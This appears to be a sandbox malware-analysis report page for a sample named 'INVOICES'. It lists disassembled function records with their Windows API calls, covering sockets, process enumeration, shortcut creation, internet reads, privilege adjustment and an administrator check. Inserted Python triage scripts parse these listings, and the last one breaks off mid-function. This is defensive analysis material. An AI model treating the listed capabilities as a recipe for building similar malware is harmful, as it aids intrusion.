• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: 258cd0f931dddcf382e06d31913856d20e375e0798d13cbaccc99daa57dd3b41
• Instruction ID: 45f332b4a90a493dfeae6f098c5ddd66735ac94b1d66197a88e332bdf2e5b72f
• Opcode Fuzzy Hash: 258cd0f931dddcf382e06d31913856d20e375e0798d13cbaccc99daa57dd3b41
• Instruction Fuzzy Hash: D541E671640214EFEB10AF64CC8AF6E77A8DF45B10F04815CFA5AAB3C3DA789D008791
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 632e03b1686456ea7cf6a1adbefdf3489ffd9a1be2cdc0370bd229fb96a8c4de
• Instruction ID: 7d84d551b3c44ce55bae064cab8d4434351a3f260585ad6920c258f6c25db727
• Opcode Fuzzy Hash: 632e03b1686456ea7cf6a1adbefdf3489ffd9a1be2cdc0370bd229fb96a8c4de
• Instruction Fuzzy Hash: 8D11E731700950AFE7216F26DC48FAE7799FF44762F048528F946D7251CB7CE842CA95
APIs
• CoInitialize.OLE32(00000000), ref: 0079C4BE
• CoCreateInstance.COMBASE(007C2D6C,00000000,00000001,007C2BDC,?), ref: 0079C4D6
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
• CoUninitialize.COMBASE ref: 0079C743
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: 2524597fe9fd58d47e96738b6e3a75794ba7a55ad2f93a3f47af3b1667bfd698
• Instruction ID: 7d5b72cc2ca6df5f63bfbe1ee8147aeefd3f64ed76d03bc59a0f566e6acab824
• Opcode Fuzzy Hash: 2524597fe9fd58d47e96738b6e3a75794ba7a55ad2f93a3f47af3b1667bfd698
• Instruction Fuzzy Hash: 40A12CB1108205AFE704EF54CC95EABB7E8EF94704F008A1CF15697192DBB4EA09CB52
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 007AEF51
• Process32FirstW.KERNEL32(00000000,?), ref: 007AEF5F
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
• Process32NextW.KERNEL32(00000000,?), ref: 007AF01F
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 007AF02E
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: aea9103ca1e729a11effa7a0bcb572419138cd5113e0c3f7a02755ffd32c6b9e
• Instruction ID: 0cce780374b6957b73bf50286d26b6e712bc439f748e682781dfbf46af8d03f1
• Opcode Fuzzy Hash: aea9103ca1e729a11effa7a0bcb572419138cd5113e0c3f7a02755ffd32c6b9e
• Instruction Fuzzy Hash: 8E516DB1504301EFE310EF24DC89E6BBBE8EF85710F10492DF59597252EB74A904CB92
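The socket/bind block, the CoCreateInstance block with its ".lnk" string and the Toolhelp32 block above all print their calls in the same "api.MODULE(args), ref: address" shape, which makes them easy to triage mechanically. The script below is an added example (not part of this report and not Joe Sandbox code): it parses those lines, converts each ref to an RVA using the "Offset: 00730000" load address from the Memory Dump Source entries, decodes the three socket() arguments with the standard Winsock constant values (AF_INET = 2, SOCK_DGRAM = 2, IPPROTO_UDP = 17), and maps groups of direct calls to coarse capability tags. The capability rules and tag names are the author's own heuristics, the sample listings are copied from the blocks above, and a call marked "Part of subcall function" is deliberately excluded from tagging because it belongs to the callee's block.

```python
"""Triage helper for the API listings in a Joe Sandbox function block.

Added example, not part of the report or of Joe Sandbox.  It parses lines of
the form "• api.MODULE(args), ref: ADDR", rebases the ref addresses to RVAs,
decodes socket() arguments and maps groups of calls to coarse capabilities.
"""
import re

IMAGE_BASE = 0x00730000  # "Offset: 00730000" in the Memory Dump Source lines

# Constructed sample blocks, copied in the shape the report prints them.
SAMPLE_BLOCKS = {
    "socket": """\
• Part of subcall function 007A7EA0: inet_addr.WS2_32(00000000), ref: 007A7ECB
• socket.WS2_32(00000002,00000002,00000011), ref: 007A68B4
• WSAGetLastError.WS2_32(00000000), ref: 007A68DD
• bind.WS2_32(00000000,?,00000010), ref: 007A6916
• closesocket.WS2_32(00000000), ref: 007A6937""",
    "com": """\
• CoInitialize.OLE32(00000000), ref: 0079C4BE
• CoCreateInstance.COMBASE(007C2D6C,00000000,00000001,007C2BDC,?), ref: 0079C4D6
• Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
• CoUninitialize.COMBASE ref: 0079C743""",
    "toolhelp": """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 007AEF51
• Process32FirstW.KERNEL32(00000000,?), ref: 007AEF5F
• Process32NextW.KERNEL32(00000000,?), ref: 007AF01F
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 007AF02E""",
}

CALL_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]+):\s*)?
        (?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.X,
)


def parse_call(line):
    """Return a dict for one API line, or None if the line is not a call."""
    m = CALL_RE.match(line)
    if not m:
        return None
    raw = (m.group("args") or "").strip()
    args = [] if raw == "" else [
        None if tok.strip() == "?" else int(tok, 16) for tok in raw.split(",")
    ]
    return {
        "api": m.group("api"),
        "module": m.group("module").upper(),
        "args": args,                             # None = argument the sandbox could not resolve
        "ref": int(m.group("ref"), 16),
        "subcall": m.group("sub") is not None,    # made inside a callee, not this function
    }


def parse_block(text):
    return [c for c in (parse_call(ln) for ln in text.splitlines()) if c is not None]


def rva(address, base=IMAGE_BASE):
    """Dump address -> RVA, so refs survive a different load base on the next run."""
    if address < base:
        raise ValueError(f"{address:#x} is below the image base {base:#x}")
    return address - base


# Winsock constant values for the three socket() arguments.
_AF = {2: "AF_INET", 23: "AF_INET6"}
_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
_PROTO = {0: "IPPROTO_DEFAULT", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def describe_socket(args):
    """Decode socket(af, type, protocol); unknown or unresolved values stay raw."""
    af, typ, proto = (list(args) + [None] * 3)[:3]
    return "/".join(str(d.get(v, v)) for d, v in ((_AF, af), (_TYPE, typ), (_PROTO, proto)))


# Heuristic rules (author's own): tag, APIs that must all appear, APIs that must not.
CAPABILITIES = [
    ("process enumeration (Toolhelp32)",
     {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, set()),
    ("listening socket", {"socket", "bind", "listen"}, set()),
    ("bound socket, no listen", {"socket", "bind"}, {"listen"}),
    ("COM object instantiated", {"CoCreateInstance"}, set()),
]


def classify(block_text, strings=()):
    """Map a block's direct calls to capability tags.  Subcall lines belong to
    the callee and are skipped so a shared helper does not tag every caller."""
    calls = [c for c in parse_block(block_text) if not c["subcall"]]
    names = {c["api"] for c in calls}
    tags = [tag for tag, need, absent in CAPABILITIES
            if need <= names and not (absent & names)]
    for c in calls:
        if c["api"] == "socket":
            tags.append("socket " + describe_socket(c["args"]))
        if c["api"] == "CoCreateInstance" and ".lnk" in strings:
            clsid = c["args"][0] if c["args"] and c["args"][0] is not None else None
            where = f"{clsid:#010x}" if clsid is not None else "an unresolved pointer"
            tags.append("'.lnk' string near CoCreateInstance: resolve the CLSID at "
                        f"{where} before calling this shortcut creation")
    return tags


if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        print(name, classify(text, strings=(".lnk",) if name == "com" else ()))
        for c in parse_block(text):
            print(f"  {c['api']:<26} {c['module']:<8} ref={c['ref']:#010x} rva={rva(c['ref']):#x}")
```

The socket block decodes to AF_INET/SOCK_DGRAM/IPPROTO_UDP with a bind but no listen, which is the shape of a UDP receiver rather than the TCP listener in the neighbouring bind/closesocket/listen block; the ".lnk" tag is deliberately a prompt to resolve the CLSID at 007C2D6C rather than a claim, since the report only shows the string and the call, not which COM class was created.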
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
• GetCursorPos.USER32(?), ref: 007BC53C
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0076BB2B,?,?,?,?,?), ref: 007BC551
• GetCursorPos.USER32(?), ref: 007BC59E
• NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0076BB2B,?,?,?), ref: 007BC5D8
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
• String ID:
• API String ID: 1423138444-0
• Opcode ID: faa5b08f1947c2e998227f6c369537635768a2c706018d8fdfe8af89b3b92f4c
• Instruction ID: 8d4608d7d41bee03c8523feb15fde6cce8eea5d5326dc885ab2e1c888227484a
• Opcode Fuzzy Hash: faa5b08f1947c2e998227f6c369537635768a2c706018d8fdfe8af89b3b92f4c
• Instruction Fuzzy Hash: EC317336600418EFCB268F54C858FEB7BB5EF49710F148165F9058B261D739AD61DBB0
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
• NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007312D8
• GetClientRect.USER32(?,?), ref: 0076B77B
• GetCursorPos.USER32(?), ref: 0076B785
• ScreenToClient.USER32(?,?), ref: 0076B790
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
• String ID:
                                                                                                                                  • API String ID: 1010295502-0
                                                                                                                                  • Opcode ID: 10ea8547d96a7d3fb974803f7d3ffcda61dfa1fcbb0ff799a497874b795a31f3
                                                                                                                                  • Instruction ID: a769ca2d1f07010651b6d7f1bd546c334e525cd82b0c7bdc39882939742c1489
                                                                                                                                  • Opcode Fuzzy Hash: 10ea8547d96a7d3fb974803f7d3ffcda61dfa1fcbb0ff799a497874b795a31f3
                                                                                                                                  • Instruction Fuzzy Hash: 30111935A00019EBDB10EF98D8899AE77B8FB05300F404555FA41E7252C738BA51CBA9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0078E93A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: ($|
                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                  • Opcode ID: 8f6fecb76b7cc15b9befd8c0e7eacc32362a09438ba13fef5fac812087542b02
                                                                                                                                  • Instruction ID: d847a73351f9fc0eb03667cfce1f9633995b319e5cc0f7f727b7205e4bc3a09a
                                                                                                                                  • Opcode Fuzzy Hash: 8f6fecb76b7cc15b9befd8c0e7eacc32362a09438ba13fef5fac812087542b02
                                                                                                                                  • Instruction Fuzzy Hash: 7B324575A00605DFC728DF29C4819AAB7F0FF48720B15C56EE89ADB3A1E770E981CB40
                                                                                                                                  APIs
                                                                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007A1920,00000000), ref: 007A24F7
                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007A252E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                  • Opcode ID: b2b3d8d00a4645a967512dfc0999cc4d2e30812bcc77c5e70353b1b55d547469
                                                                                                                                  • Instruction ID: 7da56062693e3bf215ca2967fd697658a76057956e0216f555f279eb9f2c2c47
                                                                                                                                  • Opcode Fuzzy Hash: b2b3d8d00a4645a967512dfc0999cc4d2e30812bcc77c5e70353b1b55d547469
                                                                                                                                  • Instruction Fuzzy Hash: D4410971904209FFEB20DF98DC85EBBB7BCEB85724F10416AFA01A2142DB789E529650
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0079B3CF
                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0079B429
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0079B476
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                  • Opcode ID: 17b704ccfa3688aafb9ba68cf55e81a904d0359c8040d56885e5d722de3f6811
                                                                                                                                  • Instruction ID: b129ddaeba6ff1015a838bba413ed1973c80012cbee29fab98d225d0c4780640
                                                                                                                                  • Opcode Fuzzy Hash: 17b704ccfa3688aafb9ba68cf55e81a904d0359c8040d56885e5d722de3f6811
                                                                                                                                  • Instruction Fuzzy Hash: 02214C35A00518EFDB00EFA5EC84EEDBBB8FF48310F1481A9E905AB362CB359915CB54
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                    • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
                                                                                                                                  • GetLastError.KERNEL32 ref: 00788B27
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1922334811-0
                                                                                                                                  • Opcode ID: 9e7d63eb7baccb434698c3118a1ff4bb329a8d42473c74113ad95f59ecbc2338
                                                                                                                                  • Instruction ID: b95fe13a9f34cbf486cc909094b78422fe975f13efa5f0d9fc8c8425e2e3ca05
                                                                                                                                  • Opcode Fuzzy Hash: 9e7d63eb7baccb434698c3118a1ff4bb329a8d42473c74113ad95f59ecbc2338
                                                                                                                                  • Instruction Fuzzy Hash: 1311BCB1514208AFD728AF64DC89D6BBBB8EB44711B20C26EF45693251EB74AC00CB60
                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00794A31
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00794A48
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00794A58
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                  • Opcode ID: 5ff3722d45f094f2b74436ab960ff82df198831647c8c78a931af2829d5ff410
                                                                                                                                  • Instruction ID: e4214a74fdbe06b9610a35c7137e51b2c48fb74f29fb17e3b98a9a53b57c4b56
                                                                                                                                  • Opcode Fuzzy Hash: 5ff3722d45f094f2b74436ab960ff82df198831647c8c78a931af2829d5ff410
                                                                                                                                  • Instruction Fuzzy Hash: 0EF04975A5130CBFDF00DFF0DC89EAEBBBCEF08601F0085A9E901E2191E6746A048B54
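The function records above are more useful once they are machine-readable: the ordered API sequence of each record is what an analyst pivots on, and some argument lists carry meaning on their own. The AllocateAndInitializeSid call logged above passes a sub-authority count of 2 with sub-authorities 0x20 and 0x220, which is S-1-5-32-544 (BUILTIN\Administrators) if the identifier authority, shown only as an unresolved `?`, is SECURITY_NT_AUTHORITY; paired with CheckTokenMembership that is the standard "is the caller an administrator" check. The record with AdjustTokenPrivileges is followed by GetLastError, which matters because AdjustTokenPrivileges returns TRUE even when no privilege was granted and only GetLastError (ERROR_NOT_ALL_ASSIGNED, 1300) reveals it. The parser below is an added example, not Joe Sandbox code or part of the report; the embedded sample is constructed from three of the records on this page in the same line shape, and the NT identifier authority is an assumption made explicit as a parameter.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three records in the shape Joe Sandbox uses on this page
# (only the lines the parser consumes are reproduced).
SAMPLE_REPORT = """\
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007A24F7
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007A252E
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• Opcode ID: b2b3d8d00a4645a967512dfc0999cc4d2e30812bcc77c5e70353b1b55d547469
APIs
  • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
  • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
• GetLastError.KERNEL32 ref: 00788B27
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• Opcode ID: 9e7d63eb7baccb434698c3118a1ff4bb329a8d42473c74113ad95f59ecbc2338
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00794A31
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00794A48
• FreeSid.ADVAPI32(?), ref: 00794A58
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• Opcode ID: 5ff3722d45f094f2b74436ab960ff82df198831647c8c78a931af2829d5ff410
"""

# One logged call: optional subcall prefix, Name.MODULE, optional (args), ref: addr
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>Opcode ID|API ID):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                     # raw tokens; '?' means the sandbox did not resolve it
    ref: str                       # call-site address
    subcall: Optional[str] = None  # set when the call sits in a callee, not this function

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    opcode_id: str = ""
    api_id: str = ""

def parse_records(text):
    """Split a function listing into records, one per 'APIs' header."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_LINE.match(line)
        if f:
            setattr(cur, f["key"].lower().replace(" ", "_"), f["val"])
    return records

WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}

def sid_from_allocate_args(args, authority=5):
    """Rebuild the SID AllocateAndInitializeSid builds from the logged argument list:
    [pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, ppSid]. The authority
    pointer is logged as '?', so authority=5 (SECURITY_NT_AUTHORITY) is an assumption."""
    count = int(args[1], 16)
    subs = [int(a, 16) for a in args[2:2 + count]]
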